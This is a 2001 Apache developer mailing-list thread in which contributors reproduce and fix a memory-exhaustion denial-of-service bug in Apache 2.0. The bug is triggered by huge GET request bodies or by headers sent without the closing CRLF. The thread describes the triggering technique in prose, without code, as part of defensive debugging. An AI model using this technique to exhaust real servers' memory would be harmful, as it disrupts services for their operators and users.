Re: More Dos -- Large GETs

2001-10-31 Thread Aaron Bannert

On Tue, Oct 30, 2001 at 05:55:42PM -0800, Aaron Bannert wrote:
> > Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> > times.  It was the httpd process which was growing, not my test program.
> > This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.
> 
> I am unable to reproduce this with valid HTTP request syntax and
> arbitrarily large bodies (at least against /index.html.en). The server
> grows up to an apparent limit.
> 
> However, if I omit the extra CRLF at the end of the headers (effectivly
> fusing this humongous body with the headers) I _DO_ see a massive
> memory leak.

I just committed a fix for the leak that I was seeing. Are you still seeing
the other leak with this change?

-aaron



Re: More Dos -- Large GETs

2001-10-31 Thread Jon Travis

Ok, I've tracked it a bit further.  This may be one of those 'Doctor it
hurts when I do this' types of things, but I was using an old 2.0 config
file that I had, and that was causing this.

Anyway, I gradually picked off lines from my config file vs. the distributed
one, and it looks like if you comment out the following 2 lines:

AddHandler type-map var
DirectoryIndex index.html index.html.var

Within the  for the htdocs, then the memory will go through the
roof with the method I described.

-- Jon

On Wed, Oct 31, 2001 at 10:12:47AM -0500, Greg Ames wrote:
> Jon Travis wrote:
> 
> > Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> > times.  It was the httpd process which was growing, not my test program.
> > This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.
> 
> I think you have my fix to modules/http/http_request.c, right?  If not,
> ap_get_client_block can wreak havoc when a request body exists and we do
> an internal redirect, such as when the GET is to a directory.
> 
> Also, do you send an empty line before the 'x's, or could this be the
> problem Aaron noticed?
> 
> Greg



Re: More Dos -- Large GETs

2001-10-31 Thread Jon Travis

On Wed, Oct 31, 2001 at 10:43:12AM -0600, William A. Rowe, Jr. wrote:
> From: "Jon Travis" <[EMAIL PROTECTED]>
> Sent: Wednesday, October 31, 2001 10:18 AM
> 
> 
> > I'm checking my httpd.conf file to see if there is something weird
> > there.  I am indeed sending a valid GET with a huge content-length.
> 
> To which handler, may we ask?  That might make a difference, thought it
> should not.

Just to '/'.

-- Jon




Re: More Dos -- Large GETs

2001-10-31 Thread William A. Rowe, Jr.

From: "Jon Travis" <[EMAIL PROTECTED]>
Sent: Wednesday, October 31, 2001 10:18 AM


> I'm checking my httpd.conf file to see if there is something weird
> there.  I am indeed sending a valid GET with a huge content-length.

To which handler, may we ask?  That might make a difference, thought it
should not.




Re: More Dos -- Large GETs

2001-10-31 Thread Jon Travis

I'm checking my httpd.conf file to see if there is something weird
there.  I am indeed sending a valid GET with a huge content-length.

-- Jon



On Tue, Oct 30, 2001 at 08:15:44PM -0500, Cliff Woolley wrote:
> On Tue, 30 Oct 2001, Cliff Woolley wrote:
> 
> > O... I think I see the problem.  In your test, you actually did a
> > real HTTP request and then had a really big request body.
> ...
> > Is that right, Jon?
> 
> I just reread the original message and I see that's not what Jon was
> doing.  But still, what happens if you do this?  I'll have to go try
> that
> 
> --Cliff
> 
> --
>Cliff Woolley
>[EMAIL PROTECTED]
>Charlottesville, VA
> 
> 



Re: More Dos -- Large GETs

2001-10-31 Thread Greg Ames

Jon Travis wrote:

> Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> times.  It was the httpd process which was growing, not my test program.
> This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.

I think you have my fix to modules/http/http_request.c, right?  If not,
ap_get_client_block can wreak havoc when a request body exists and we do
an internal redirect, such as when the GET is to a directory.

Also, do you send an empty line before the 'x's, or could this be the
problem Aaron noticed?

Greg



Re: More Dos -- Large GETs

2001-10-31 Thread Greg Ames

Aaron Bannert wrote:

> However, if I omit the extra CRLF at the end of the headers (effectivly
> fusing this humongous body with the headers) I _DO_ see a massive
> memory leak.

This sucks/needs to be fixed.  We used to have a limit on the length of
a header line, maybe 8K.  What happened to it?  (never mind, I'll go
look)

Greg



Re: More Dos -- Large GETs

2001-10-30 Thread Aaron Bannert

On Tue, Oct 30, 2001 at 03:48:48PM -0800, Jon Travis wrote:
> On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> > Jon Travis <[EMAIL PROTECTED]> writes:
> > 
> > > It's possible to make Apache eat up all available memory on a system
> > > by sending a GET with a large Content-Length (like several hundred MB),
> > > and then sending that content.  This is as of HEAD about 5 minutes ago.
> > 
> > Maybe the problem is your client implementation?  You didn't by any
> > chance get a mongo buffer to hold the request body did you?
> > 
> > I just sent a GET w/ 500,000,000-byte body and didn't suffer.
> > 
> > strace showed that server process was pulling in 8K at a time...  lots
> > of CPU between client and server but no swap fest.
> 
> Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> times.  It was the httpd process which was growing, not my test program.
> This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.

I am unable to reproduce this with valid HTTP request syntax and
arbitrarily large bodies (at least against /index.html.en). The server
grows up to an apparent limit.

However, if I omit the extra CRLF at the end of the headers (effectivly
fusing this humongous body with the headers) I _DO_ see a massive
memory leak.

Email me privatly if you'd like the test client program I whipped together.

-aaron




Re: More Dos -- Large GETs

2001-10-30 Thread Cliff Woolley

On 30 Oct 2001, Jeff Trawick wrote:

> Jon Travis <[EMAIL PROTECTED]> writes:
>
> > Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> > times.  It was the httpd process which was growing, not my test program.
> > This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.
>
> Hmmm... do you have any extra input filters configured?
>
> I don't know what would be different between our tests...  More
> information about mine:
>
> default_handler() was used to generate the response
>
> it calls ap_discard_request_body() which calls
> ap_get_client_block(,,8K) in a loop
>
> no input filters beyond those added automatically to implement HTTP

O... I think I see the problem.  In your test, you actually did a
real HTTP request and then had a really big request body.  In Jon's test,
it sounds like he did NOT make a real HTTP request, but instead just sent
millions of x's with no intervening newlines.  So one of the input filters
would just keep reading and reading waiting for that first line to end so
it could see if it's a valid HTTP request or not.

Is that right, Jon?

--Cliff


--
   Cliff Woolley
   [EMAIL PROTECTED]
   Charlottesville, VA





Re: More Dos -- Large GETs

2001-10-30 Thread Jon Travis

On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> Jon Travis <[EMAIL PROTECTED]> writes:
> 
> > It's possible to make Apache eat up all available memory on a system
> > by sending a GET with a large Content-Length (like several hundred MB),
> > and then sending that content.  This is as of HEAD about 5 minutes ago.
> 
> Maybe the problem is your client implementation?  You didn't by any
> chance get a mongo buffer to hold the request body did you?
> 
> I just sent a GET w/ 500,000,000-byte body and didn't suffer.
> 
> strace showed that server process was pulling in 8K at a time...  lots
> of CPU between client and server but no swap fest.

Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
times.  It was the httpd process which was growing, not my test program.
This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.

-- Jon